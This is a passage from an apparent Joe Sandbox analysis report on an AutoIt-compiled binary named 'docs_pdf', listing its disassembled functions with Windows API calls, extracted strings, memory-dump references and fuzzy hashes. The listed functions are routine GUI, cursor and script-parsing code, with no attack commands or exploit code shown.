                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 01027ACE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    • Opcode ID: 08be7cfccd37820500e9cb5221378453aa4b8ec58ef7e5e5fc5b93ac75fd3a21
                                    • Instruction ID: 2d46fb61065c92d24f6b66cfde97dbf38802158487eb13f038f280f569f51dc4
                                    • Opcode Fuzzy Hash: 08be7cfccd37820500e9cb5221378453aa4b8ec58ef7e5e5fc5b93ac75fd3a21
                                    • Instruction Fuzzy Hash: A9A170B1A40615BFEB24DBA5DC4AFAE7BBDEB44710F004104FA55A72D0CBB9AD01CB60
                                    Function 0101AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0101AF89
                                    • GetDriveTypeW.KERNEL32(?,0103FAC0,?,\\.\,0103F910), ref: 0101B066
                                    • SetErrorMode.KERNEL32(00000000,0103FAC0,?,\\.\,0103F910), ref: 0101B1C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: ee174a3e976c18f136cc24cb04863d132ee8c8e203e51fca89c2d5627a29d1d7
                                    • Instruction ID: 67aeecf4daff7ef7073c9ff7424fafef3fafbe5ac436c6bd2e7281b2bd194a76
                                    • Opcode Fuzzy Hash: ee174a3e976c18f136cc24cb04863d132ee8c8e203e51fca89c2d5627a29d1d7
                                    • Instruction Fuzzy Hash: 5E51BF30784305EB8B10EB26CD92DBC77B8BB54685B514059F8CBBB258C77DAD41DB42
                                    Function 00FB6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 1038674560-86951937
                                    • Opcode ID: 2e5d301f58b4b5aad41013040db26d96fdd9e6bd3b186880cb9fc36199703413
                                    • Instruction ID: ed18e149195c96a43263a21befff7137daa87dedbae1a69b9b733c02a66410f0
                                    • Opcode Fuzzy Hash: 2e5d301f58b4b5aad41013040db26d96fdd9e6bd3b186880cb9fc36199703413
                                    • Instruction Fuzzy Hash: C9813B71B00242BBCB24BB22DC82FEA776DAF54710F044026F941EA195EB6CDA45FA51
                                    Function 0103AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 0103AB99
                                    • SetTextColor.GDI32(?,?), ref: 0103AB9D
                                    • GetSysColorBrush.USER32(0000000F), ref: 0103ABB3
                                    • GetSysColor.USER32(0000000F), ref: 0103ABBE
                                    • CreateSolidBrush.GDI32(?), ref: 0103ABC3
                                    • GetSysColor.USER32(00000011), ref: 0103ABDB
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0103ABE9
                                    • SelectObject.GDI32(?,00000000), ref: 0103ABFA
                                    • SetBkColor.GDI32(?,00000000), ref: 0103AC03
                                    • SelectObject.GDI32(?,?), ref: 0103AC10
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0103AC2F
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0103AC46
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0103AC5B
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0103ACA7
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0103ACCE
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0103ACEC
                                    • DrawFocusRect.USER32(?,?), ref: 0103ACF7
                                    • GetSysColor.USER32(00000011), ref: 0103AD05
                                    • SetTextColor.GDI32(?,00000000), ref: 0103AD0D
                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0103AD21
                                    • SelectObject.GDI32(?,0103A869), ref: 0103AD38
                                    • DeleteObject.GDI32(?), ref: 0103AD43
                                    • SelectObject.GDI32(?,?), ref: 0103AD49
                                    • DeleteObject.GDI32(?), ref: 0103AD4E
                                    • SetTextColor.GDI32(?,?), ref: 0103AD54
                                    • SetBkColor.GDI32(?,?), ref: 0103AD5E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: f7cbeffc7fe7f3e92fa70f44c4e734a65ca0176c01b172f0c3bcffedd7cfcdf4
                                    • Instruction ID: d94b1b92a7bb591ee5609d1ccaf9cbd4353f61050799033ba3644c42759bedb3
                                    • Opcode Fuzzy Hash: f7cbeffc7fe7f3e92fa70f44c4e734a65ca0176c01b172f0c3bcffedd7cfcdf4
                                    • Instruction Fuzzy Hash: 92617F71D00219FFDB219FA8DC48EAE7BBDFB48320F104515FA91AB291D7769940DB90
                                    Function 01038C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01038D34
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01038D45
                                    • CharNextW.USER32(0000014E), ref: 01038D74
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01038DB5
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01038DCB
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01038DDC
                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01038DF9
                                    • SetWindowTextW.USER32(?,0000014E), ref: 01038E45
                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01038E5B
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01038E8C
                                    • _memset.LIBCMT ref: 01038EB1
                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01038EFA
                                    • _memset.LIBCMT ref: 01038F59
                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01038F83
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 01038FDB
                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 01039088
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 010390AA
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010390F4
                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01039121
                                    • DrawMenuBar.USER32(?), ref: 01039130
                                    • SetWindowTextW.USER32(?,0000014E), ref: 01039158
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                    • String ID: 0
                                    • API String ID: 1073566785-4108050209
                                    • Opcode ID: 96caa10bf51a71a011aa650534aacd68813ca4609e1a56303dbdeadd9e87be9c
                                    • Instruction ID: 06f05ba393b1159dce663182535c3e6d6f9ce5d232c5de84f420fc269e58b676
                                    • Opcode Fuzzy Hash: 96caa10bf51a71a011aa650534aacd68813ca4609e1a56303dbdeadd9e87be9c
                                    • Instruction Fuzzy Hash: 19E1B470900209AFDF209F64CC88EEE7BBDFF45714F00829AFA95AA290D7758645DF61
                                    Function 01034B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 01034C51
                                    • GetDesktopWindow.USER32 ref: 01034C66
                                    • GetWindowRect.USER32(00000000), ref: 01034C6D
                                    • GetWindowLongW.USER32(?,000000F0), ref: 01034CCF
                                    • DestroyWindow.USER32(?), ref: 01034CFB
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01034D24
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01034D42
                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01034D68
                                    • SendMessageW.USER32(?,00000421,?,?), ref: 01034D7D
                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01034D90
                                    • IsWindowVisible.USER32(?), ref: 01034DB0
                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01034DCB
                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01034DDF
                                    • GetWindowRect.USER32(?,?), ref: 01034DF7
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 01034E1D
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 01034E37
                                    • CopyRect.USER32(?,?), ref: 01034E4E
                                    • SendMessageW.USER32(?,00000412,00000000), ref: 01034EB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 5045647211aa7cb0a836a4f67bdb2543e30bb319f29f94bc7dc58c3fe3fb3fb8
                                    • Instruction ID: 401585b9e9bbc86ed50c05975a750dd15362b789ca7691d352eaafde14fcf6ac
                                    • Opcode Fuzzy Hash: 5045647211aa7cb0a836a4f67bdb2543e30bb319f29f94bc7dc58c3fe3fb3fb8
                                    • Instruction Fuzzy Hash: ADB16B71608341AFDB54DF29C848B5ABBE8BF88710F00895CF6D9DB2A1D775E805CB92
                                    Function 00FB27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB28BC
                                    • GetSystemMetrics.USER32(00000007), ref: 00FB28C4
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB28EF
                                    • GetSystemMetrics.USER32(00000008), ref: 00FB28F7
                                    • GetSystemMetrics.USER32(00000004), ref: 00FB291C
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FB2939
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FB2949
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FB297C
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FB2990
                                    • GetClientRect.USER32(00000000,000000FF), ref: 00FB29AE
                                    • GetStockObject.GDI32(00000011), ref: 00FB29CA
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB29D5
                                      • Part of subcall function 00FB2344: GetCursorPos.USER32(?), ref: 00FB2357
                                      • Part of subcall function 00FB2344: ScreenToClient.USER32(010767B0,?), ref: 00FB2374
                                      • Part of subcall function 00FB2344: GetAsyncKeyState.USER32(00000001), ref: 00FB2399
                                      • Part of subcall function 00FB2344: GetAsyncKeyState.USER32(00000002), ref: 00FB23A7
                                    • SetTimer.USER32(00000000,00000000,00000028,00FB1256), ref: 00FB29FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: b9c79da141e16552adb860468f8c434b77849c6f67b583df90a39afce946da85
                                    • Instruction ID: 4f4ee8789afa3a4f0291bb9089f83c33878775e242d89624892e5a68408f46e2
                                    • Opcode Fuzzy Hash: b9c79da141e16552adb860468f8c434b77849c6f67b583df90a39afce946da85
                                    • Instruction Fuzzy Hash: 88B18E71A0020AEFDB24DFA9D845BED7BB8FB08310F108219FA56E6294DB39D801DF51
                                    Function 01034069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 010340F6
                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 010341B6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                    • API String ID: 3974292440-719923060
                                    • Opcode ID: ea2006963c7824a5d10b135ae09a56634691049a23b4bfd3b35acb737a884c85
                                    • Instruction ID: 31f8d291c6194a0a3cb172baafc30fa22c443c991bf3f528542917bfc04b5497
                                    • Opcode Fuzzy Hash: ea2006963c7824a5d10b135ae09a56634691049a23b4bfd3b35acb737a884c85
                                    • Instruction Fuzzy Hash: 3FA18D702143029BDB14EF25CD51AAAB7EABF84314F048959B9D6AB3D2DF78EC05CB41
                                    Function 010252F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 01025309
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 01025314
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0102531F
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 0102532A
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 01025335
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 01025340
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0102534B
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 01025356
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 01025361
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0102536C
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 01025377
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 01025382
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0102538D
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 01025398
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 010253A3
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 010253AE
                                    • GetCursorInfo.USER32(?), ref: 010253BE
                                    • GetLastError.KERNEL32(00000001,00000000), ref: 010253E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Cursor$Load$ErrorInfoLast
                                    • String ID:
                                    • API String ID: 3215588206-0
                                    • Opcode ID: 6f49e1bd2bdbb5d8044ca31ebe2367e89926518b599f6ab6188d7e7cd9b49629
                                    • Instruction ID: ed6bb56efad50a55d473f480456a7ca8d0bf751b93d6a15e8e6c2fc1d64328cd
                                    • Opcode Fuzzy Hash: 6f49e1bd2bdbb5d8044ca31ebe2367e89926518b599f6ab6188d7e7cd9b49629
                                    • Instruction Fuzzy Hash: D4415370E083296ADB109FBA8C499AEFFF8EF51B10F10452FE549E7290DAB89501CE55
                                    Function 0100AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0100AAA5
                                    • __swprintf.LIBCMT ref: 0100AB46
                                    • _wcscmp.LIBCMT ref: 0100AB59
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0100ABAE
                                    • _wcscmp.LIBCMT ref: 0100ABEA
                                    • GetClassNameW.USER32(?,?,00000400), ref: 0100AC21
                                    • GetDlgCtrlID.USER32(?), ref: 0100AC73
                                    • GetWindowRect.USER32(?,?), ref: 0100ACA9
                                    • GetParent.USER32(?), ref: 0100ACC7
                                    • ScreenToClient.USER32(00000000), ref: 0100ACCE
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0100AD48
                                    • _wcscmp.LIBCMT ref: 0100AD5C
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0100AD82
                                    • _wcscmp.LIBCMT ref: 0100AD96
                                      • Part of subcall function 00FD386C: _iswctype.LIBCMT ref: 00FD3874
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                    • String ID: %s%u
                                    • API String ID: 3744389584-679674701
                                    • Opcode ID: ce87e9ca0fe18816b0e2cc14efdc8d325a81431d7ba5cc2054b32826ef6a56b7
                                    • Instruction ID: aa93e3988ca04f692f8c6952dd4e30afcd1e20222df1fd71e33623659807297f
                                    • Opcode Fuzzy Hash: ce87e9ca0fe18816b0e2cc14efdc8d325a81431d7ba5cc2054b32826ef6a56b7
                                    • Instruction Fuzzy Hash: CDA1CF71204706EFE716EE28C884FAABBE8FF04315F04462AFADA83191D734E545CB91
                                    Function 0100B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0100B3DB
                                    • _wcscmp.LIBCMT ref: 0100B3EC
                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0100B414
                                    • CharUpperBuffW.USER32(?,00000000), ref: 0100B431
                                    • _wcscmp.LIBCMT ref: 0100B44F
                                    • _wcsstr.LIBCMT ref: 0100B460
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0100B498
                                    • _wcscmp.LIBCMT ref: 0100B4A8
                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0100B4CF
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0100B518
                                    • _wcscmp.LIBCMT ref: 0100B528
                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0100B550
                                    • GetWindowRect.USER32(00000004,?), ref: 0100B5B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                    • String ID: @$ThumbnailClass
                                    • API String ID: 1788623398-1539354611
                                    • Opcode ID: 06229acb54c0dba870ada83105ca880baac8c5c93860db5a2f350fef5a623d42
                                    • Instruction ID: 8317e953d5fbe43207a1b7c069b5e71f19603cc389db36308d51373621602536
                                    • Opcode Fuzzy Hash: 06229acb54c0dba870ada83105ca880baac8c5c93860db5a2f350fef5a623d42
                                    • Instruction Fuzzy Hash: A381C4710043069BEB12DF14C885FAA7BD8FF44714F0885AAFDC59A1D2DB38DA45CB61
                                    Function 0100B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                    • API String ID: 1038674560-1810252412
                                    • Opcode ID: 2b09deaa6a66a5eaa545158c0a1480be2fb8c21b62cb2d7d93ebee178dd33475
                                    • Instruction ID: 7b42e423303b8ef6a6e79a55ca2665fbd4131eeb0e43449e54a30958829bcc50
                                    • Opcode Fuzzy Hash: 2b09deaa6a66a5eaa545158c0a1480be2fb8c21b62cb2d7d93ebee178dd33475
                                    • Instruction Fuzzy Hash: 7D31C138A04306AAEB11FA62CD43EEE77ADAF14B50F60002AF4C1764D2EF796E04D951
                                    Function 0100C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 0100C4D4
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0100C4E6
                                    • SetWindowTextW.USER32(?,?), ref: 0100C4FD
                                    • GetDlgItem.USER32(?,000003EA), ref: 0100C512
